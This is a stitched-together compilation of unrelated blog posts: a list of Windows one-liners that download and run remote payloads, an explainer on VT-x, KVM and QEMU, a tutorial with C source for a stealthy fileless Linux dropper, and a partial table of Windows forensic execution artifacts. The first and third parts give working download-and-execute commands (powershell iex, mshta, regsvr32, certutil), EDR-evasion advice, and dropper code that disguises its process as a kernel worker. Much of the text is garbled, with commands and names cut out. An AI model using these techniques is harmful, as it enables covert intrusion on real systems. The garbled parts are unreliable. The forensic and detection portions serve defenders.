Windows oneliners to download remote payload and execute arbitrary code

( origin text )

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.


Ok, this is by far the most famous one, but also probably the most monitored oneif not blocked. A well known proxy friendly command line is the following:

powershell -
bypass -c
"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('<a href="http://webserver/payload.ps1">http://webserver/payload.ps1</a>')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

powershell -
bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script:
So once you’ve been creative with your payload as a batch file, go for it:

&lt; \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Also very common, but the idea here is to download the payload from a remote server in one command line:

:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

mshta vbscript:Close(Execute(
"script:<a href="http://webserver/payload.sct">http://webserver/payload.sct</a>"

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

mshta http:

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

rundll32.exe javascript:
"script:<a href="http://webserver/payload.sct">http://webserver/payload.sct</a>"

Process performing network call: rundll32.exe
Payload written on disk: IE local cache


Discovered by @subTee with @mattifestation, wmic can invoke an XSL (eXtensible Stylesheet Language) local or remote file, which may contain some scripting of our choice:

wmic os get
"<a href="https://webserver/payload.xsl">https://webserver/payload.xsl</a>"

Process performing network call: wmic.exe
Payload written on disk: IE local cache


Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:


Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

{regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache


Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

"set MB="
" &amp; !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml &gt; payload.xml &amp; !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands

After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

certutil -urlcache -
-f http:

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

certutil -urlcache -
-f http:
.b64 payload.b64 &amp; certutil -decode payload.b64 payload.dll &amp; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil

You could simply deliver an executable:

certutil -urlcache -
-f http:
.b64 payload.b64 &amp; certutil -decode payload.b64 payload.exe &amp; payload.exe

There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post !

One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

Payloads source examples

All the command lines previously cited make use of specific payloads:

  • Various scriplets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github:

You can also find some other examples on my gist:

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:



At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.


VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.


Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.


Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.


Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:


Super-Stealthy Droppers

( origin article )

Some weeks ago I found [this interesting article] ( 383), about injecting code in running processes without using 


. The article is very interesting and I recommend you to read it, but what caught my attention was a brief sentence towards the end. Actually this one:

The current payload in use is a simple 



I’ve never heard before about 




… that’s why this sentence caught my attention.

In this paper we are going to talk about how to use these functions to develop a super-stealthy dropper. You could consider it as a malware development tutorial… but you know that it is illegal to develop and also to deploy malware. This means that, this paper is only for educational purposes… because, after all, a malware analyst needs to know how malware developers do their stuff in order to identify it, neutralise it and do what is needed to keep systems safe.




So, after reading that intriguing sentence, I googled those two functions and I saw they were pretty cool. The first one is actually pretty awesome, it allows us to create a file in memory. We have quickly talked about this in [a previous paper] (Running binaries without leaving tracks), but for that we were just using 


 to store our file. That folder is actually stored in memory so, whatever we write there does not end up in the hard-drive (unless we run out of memory and we start swapping). However, the file was visible with a simple 




 does the same, but the memory disk it uses is not mapped into the file system and therefore you cannot find the file with a simple 


. 😮

The second one, 


 is also pretty awesome. It allows us to execute a program (exactly the same way that 


), but we reference the program to run using a file descriptor, instead of the full path. And this one matches perfectly with 



But there is a caveat with this function calls. They are relatively new. 


 was introduced in kernel 3.17 and 


 is a 


 function available since version 2.3.2. While, 


 can be easily implemented when not available (we will see that in a sec), 


 is just not there on old kernels…

What does this means?. It means that, at least nowadays, the technique we are going to describe will not work on embedded devices that usually run old kernels and have stripped-down versions of libc. Although, I haven’t checked the availability of 


 in for instance some routers or Android phones, I believe it is very likely that they are not available. If anybody knows, please drop a line in the comments.

A simple dropper

In order to figure out how these two little guys work, I wrote a simple dropper. Well, it is actually a program able to download some binary from a remote server and run it directly into memory, without dropping it in the disk.

Before continuing, let’s check the Hajime case we described [towards the end of this post] (IoT Malware Droppers (Mirai and Hajime)). There you will find a cryptic shell line that basically creates a file with execution permissions to drop into it another file which is downloaded from the net. Then the downloaded program gets executed and deleted from the disk. In case you don’t want to open the link again, this is the line I’m talking about:

cp .s .i; &gt;.i; .<span class="hljs-regexp">/.s&gt;.i; ./</span>.i; rm .s; /bin/busybox ECCHI

We are going to write a version of 


 that, once executed, will do exactly the same that the cryptic shell line above.

Let’s first take a look to the code and then we can comment it.

The code

This is the code:

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/syscall.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/types.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/socket.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;arpa/inet.h&gt;</span></span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> __NR_memfd_create 319</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> MFD_CLOEXEC 1</span>

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> <span class="hljs-keyword">int</span> <span class="hljs-title">memfd_create</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *name, <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> flags)</span> </span>{
    <span class="hljs-keyword">return</span> syscall(__NR_memfd_create, name, flags);

<span class="hljs-keyword">extern</span> <span class="hljs-keyword">char</span>        **environ;

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span> <span class="hljs-params">(<span class="hljs-keyword">int</span> argc, <span class="hljs-keyword">char</span> **argv)</span> </span>{
  <span class="hljs-keyword">int</span>                fd, s;
  <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>      addr = <span class="hljs-number">0x0100007f11110002</span>;
  <span class="hljs-keyword">char</span>               *args[<span class="hljs-number">2</span>]= {<span class="hljs-string">"[kworker/u!0]"</span>, <span class="hljs-literal">NULL</span>};
  <span class="hljs-keyword">char</span>               buf[<span class="hljs-number">1024</span>];

  <span class="hljs-comment">// Connect</span>
  <span class="hljs-keyword">if</span> ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);
  <span class="hljs-keyword">if</span> (connect (s, (struct sockaddr*)&amp;addr, <span class="hljs-number">16</span>) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);
  <span class="hljs-keyword">if</span> ((fd = memfd_create(<span class="hljs-string">"a"</span>, MFD_CLOEXEC)) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);

  <span class="hljs-keyword">while</span> (<span class="hljs-number">1</span>) {
      <span class="hljs-keyword">if</span> ((read (s, buf, <span class="hljs-number">1024</span>) ) &lt;= <span class="hljs-number">0</span>) <span class="hljs-keyword">break</span>;
      write (fd, buf, <span class="hljs-number">1024</span>);
  close (s);
  <span class="hljs-keyword">if</span> (fexecve (fd, args, environ) &lt; <span class="hljs-number">0</span>) <span class="hljs-built_in">exit</span> (<span class="hljs-number">1</span>);

  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

It is pretty short and simple, isn’t it?. But there are a couple of things we have to say about it.



The first thing we have to comment is that, there is no 


 wrapper to the 


 system call. You would find this information in the 


 manpage’s NOTES section 42. That means that we have to write our own wrapper.

First, we need to figure out the syscall index for 


. Just use any on-line syscall list. Remember that the indexes changes with the architecture, so if you plan to use the code on an ARM or a MIPS, you may need to use a different index. The index we used 


 is for 



You can see the wrapper at the very beginning of the code (just after the 


 directives), using the 


 libc function.

Then, the program just does the following:

  • Create a normal TCP socket
  • Connect to port 0x1111 on using family 

    … We have packed all this information in a 


     variable to make the code shorter… but you can easily modify this information taking into account that:

    addr = <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>  <span class="hljs-number">7</span>f   <span class="hljs-number">1111</span>  <span class="hljs-number">0002</span>;
            <span class="hljs-number">1</span>. <span class="hljs-number">0</span>. <span class="hljs-number">0</span>.<span class="hljs-number">127</span>   <span class="hljs-number">1111</span>  <span class="hljs-number">0002</span>;
             IP Address <span class="hljs-params">| Port |</span> Family

Of course this is not standard and whenever the 

struct sockaddr_in

 change, the code will break down… but it was cool to write it like this :stuck_out_tongue:

  • Creates a memory file
  • Reads data from the socket and writes it into the memory file
  • Runs the memory file once all the data has been transferred.

That’s it… very simple and straightforward.


So, now it is time to test it. According to our long constant in the 


 function, the 


 will connect to port 


 on localhost (

). So we will improvise a file server with 



In one console we just run this command:

$ cat /usr/bin/xeyes | nc -l $((<span class="hljs-number">0x1111</span>))

You can chose whatever binary you prefer. I like those little eyes following my mouse pointer all over the place

Then in another console we run the dropper, and those funny 


 should pop-up in your screen. Let’s see which tracks we can find after running the remote code.

Detecting the dropper

Spotting the process is difficult because we have given it a funny name (


). Note the 


 character that is just there to allow me to quickly identify the process for debugging purposes. In reality, you would like to use a 


 so the process looks like one of those kernel workers. But, let’s look at the 



$ ps axe
 2126 ?        S      0:00 [kworker/0:0]
 2214 pts/0    S+     0:00 [kworker/u!0]

You can see the output for a legit 


 process in the first line, and then you find our doggy program in the second line… which is associated to a pseudo-terminal!!!.. I think this can be easily avoided… but I will leave this to you to sharp your UNIX development skills :wink:

However, even if you detach the process from the pseudo-terminal…

Invisible file

We mentioned that 


 will create a file in a RAM filesystem that is not mapped into the normal filesystem tree… at least, if it is mapped, I couldn’t find where. So far this looks like a pretty stealth way to drop a file!!

However, let’s face it, if there is a file somewhere, there should be a way to find it… shouldn’t it? Of course it is. But, when you are in this kind of troubles… who you gonna call?.. Sure… Ghostbusters!. And you know what?, for GNU/Linux systems the way to bust ghosts is using 



$ lsof | grep memfd
3         2214            pico  txt       REG                0,5    19928      28860 /memfd:a (deleted)

So, we can easily find any 


 file in the system using 


. Note that 


 will also indicate the associated PID so we can also easily pin point the dropped process even when it is using some name camouflage and it is not associated to a pseudo-terminal!!!

What if 


 is not available?

We have mentioned that 


 is only available on kernels 3.17 or higher. What can be done for other kernels?. In this case we will be a bit less stealthy but we can still do pretty well.

Our best option in this case is to use 


 (SHared Memory Open). This function basically creates a file under 


… however, this one will be visible with 


, but at least we avoid writing to the disk. The only difference between using 


 or just 


 is that 


 will create the files directly under 


. While, when using 


 we have to provide the whole path.

To modify the dropper to use 


 we have to do two things.

First we have to substitute the 


 call by a 


 call like this:

<span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDWR | O_CREAT, S_IRWXU)) &lt; 0) <span class="hljs-built_in">exit</span> (1);

The second thing is that we need to close the file and re-open it read-only in order to be able to execute it with 


. So, after the while loop that populates the file we have to close and re-open the file:

  <span class="hljs-keyword">close</span> (fd);

  <span class="hljs-keyword">if</span> ((fd = shm_open(<span class="hljs-string">"a"</span>, O_RDONLY, <span class="hljs-number">0</span>)) &lt; <span class="hljs-number">0</span>) <span class="hljs-keyword">exit</span> (<span class="hljs-number">1</span>);

However note that, now it does not make much sense to use 


 and we can avoid reopening the file read-only and just call 


 on the file created at 


 which is effectively the same and it is also shorter.

… and what if 


 is not available?

This one is pretty easy, whenever you get to know how 


 works. How can you figure out how the function works?.. just google for its source code!!!. A hint is provided in the man page tho:

On Linux, fexecve() is implemented using the proc(5) file system, so /proc needs to be mounted and available at the time of the call.

So, what it does is to just use 


 but providing as file path the file descriptor entry under 


. Let’s elaborate this a bit more. You know that each open file is identified by an integer and you also know that each process in your GNU/Linux system exports all its related information under the 


 pseudo file system in a folder named against its PID (supposing the 


 file system is mounted). Well, inside that folder you will find another folder named 


 containing a file per each file descriptor opened by the process. Each file is named against its actual file descriptor, that is, the integer number.

Knowing all this, we can run a file identified by a file descriptor just passing the path to the right file under 




. A basic implementation of 


 will look like this:

<span class="hljs-function"><span class="hljs-keyword">int</span>
<span class="hljs-title">my_fexecve</span> <span class="hljs-params">(<span class="hljs-keyword">int</span> fd, <span class="hljs-keyword">char</span> **arg, <span class="hljs-keyword">char</span> **env)</span> </span>{
  <span class="hljs-keyword">char</span>  fname[<span class="hljs-number">1024</span>];

  <span class="hljs-built_in">snprintf</span> (fname, <span class="hljs-number">1024</span>, <span class="hljs-string">"/proc/%d/fd/%d"</span>, getpid(), fd);
  execve (fname, arg, env);
  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

This implementation of 


 is completely equivalent to the standard one… well it is missing some sanity checks but, after all, we’re living in the edge :P.

As mentioned before, this is very convenient to be used together with 


 that returns to us a file descriptor and does not require the 


 sequence. Otherwise, when there is a file somewhere, even in memory, it is even faster to just use 


 as you can infer from the implementation above.


Well, this is it. Hope you have found this interesting. It was interesting for me. Now, after having read this paper, you should be able to figure out what the open/memfd_create/sendfile/fexecve we mentioned at the beginning means…

We have also seen a quite stealthy technique to drop files in a remote system. And we have also learn how to detect the dropper even when it may look invisible at first glance.

You can download all the code from: 0x00pf/0x00sec_code

Available Artifacts — Evidence of Execution

The main focus of this post, and particularly the associated table of artifacts, is to serve as a reference and reminder of what evidence sources may be available on a particular system during analysis.

On to the main event. The table below details some of the artifacts which evidence program execution and whether they are available for different versions of the Windows Operating System.

Too Small?… It’s a hyperlink!

Cells in Green are where the artifact is available by default, note some artifacts may not be available despite a Green cell (e.g. instances where prefetch is disabled due to an SSD)

Cells in yellow indicate that the artifact is associated with a feature that is disabled by default but that may be enabled by an administrator (e.g. Prefetch on a Windows Server OS) or added through the application of a patch or update (e.g. The introduction of BAM to Windows 10 in 1709+ or back-porting of Amcache to Windows 7 in the optional update KB2952664+)

Cells in Red indicate that the artifact is not available in that version of the OS.

Cells in Grey (containing «TBC») indicate that I’m not 100% sure at the time of writing whether the artifact is present in a particular OS version, that I have more work to do, and that it would be great if you could let me know if you already know the answer!

It is my hope that this table will be helpful to others. It will be updated and certainly at this stage it may be subject to errors as I am reliant upon research and memory of artifacts without having the opportunity to double check each entry through testing. Feedback, both in the form of suggested additions and any required corrections is very much appreciated and encouraged.

Summary of Artifacts

What follows below is brief details on the availability of these artifacts, some useful resources for additional information and tools for parsing them. It is not my intention to go into detail as to the functioning of the artifacts as this is generally already well covered within the references.


Prefetch has historically been the go to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which have still had prefetch enabled (particularaly in businesses which push a standard image) so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, but the same applies.

The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled



It should be noted that the presence of an entry for an executable within the ShimCache doesn’t always mean it was executed as merely navigating to it can cause it to be listed. Additionally Windows XP ShimCache is limited to 96 entries all versions since then retain up to 1024 entries.

ShimCache has one further notable drawback. The information is retained in memory and is only written to the registry when the system is shutdown. Data can be retrieved from a memory image if available.



Programs executed via Explorer result in MUICache entries being created within the NTUSER.DAT of the user responsible.


Amcache / RecentFileCache.bcf

Amcache.hve within Windows 8+ and RecentFileCache.bcf within Windows 7 are two distinct artifacts which are used by the same mechanism in Windows to track application compatibility issues with different executables. As such it can be used to determine when executables were first run.


Microsoft-Windows-TaskScheduler (200/201)

The Microsoft-Windows-TaskScheduler log file (specifically events 200 and 201), can evidence the starting and stopping of and executable which is being run as a scheduled task.


LEGACY_* Registry Keys

